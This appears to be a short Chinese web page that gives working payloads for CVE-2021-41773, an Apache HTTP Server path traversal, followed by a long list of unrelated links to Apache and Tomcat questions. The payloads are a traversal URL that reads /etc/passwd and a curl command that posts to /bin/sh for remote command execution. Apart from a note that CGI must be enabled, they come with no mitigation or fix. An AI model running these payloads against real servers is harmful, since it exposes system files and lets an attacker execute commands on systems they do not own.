CVE-2021-41773
poc: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
但是近期国外的师傅研究出了直接RCE的方法,Payload如下:
curl --data "A=|id>/tmp/x" 'URL/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
如果想要进行RCE的话就要开启CGI。
详细解决方案
相关解决方案
- apache-tomcat-7.0.32下的html页面不能访问有关问题
- org.apache.xerces.impl.msg.XMLMessages not loaded解决方案
- org.apache.http.client.HttpClient与org.apache.commons.httpclient.HttpClient的差别
- org.apache.axis.client.Service的有关问题
- myeclipse集成tomcat之后,启动tomcat,一直处在Starting Servlet Engine: Apache Tomcat/6.0.14,该如何解决
- 软件 apache-tomcat(这是一个文件)跟 单独下载apache 和 tomcat有什么区别 ?该如何处理
- Apache Synapse ESB 怎么使用
- org.apache.tools.zip.ZipOutputStream 压缩后可否按添加顺序
- org.apache.tools.zip.ZipOutputStream 压缩后可不可以按添加顺序
- Apache CGI 两问,该如何解决
- apache tomcat启动有关问题,跟大家探讨一上
- apache+tomcat配置url rewrite 的怪有关问题
- apache tomcat 整合有关问题
- apache+tomcat负载均衡与集群性能疑问解决办法
- apache commons包中的bag和双向地图
- Apache+Tomcat+Proxy集群要领
- 建好一个基于 Apache 的SVN服务器后,第一次怎么将源代码放在服务器下
- apache+svn配备,passwd文件需另配
- apache 和tomcat 的站点搭建???
- JSP [Class org.apache.commons.logging.LogFactory not found in import] ...
- "login.jsp": java.lang.NoClassDefFoundError: org/apache/jasper/Js ...
- import org.apache.stryts.action.Action
- org.apache.jasper.JasperException: Unsupported encoding: GB2312
- apache tomcat 路径如何设置?
- The full stack trace of the root cause is available in the Apache Tomc ...
- jsp环境搭配,apache+tomcat+mysql的环境~
- org.apache.commons.dbcp.BasicDataSource;
- 运行jsp项目出现The Apache Tomcat Native library not found错误应该怎么修 ...
- Apache CGI 两问,该怎么解决
- 求:php 连接 MSSQL2008 代码,以及异常解答。 Win2008:Apache+php5.3.2 VC9 TS+MSSQL2008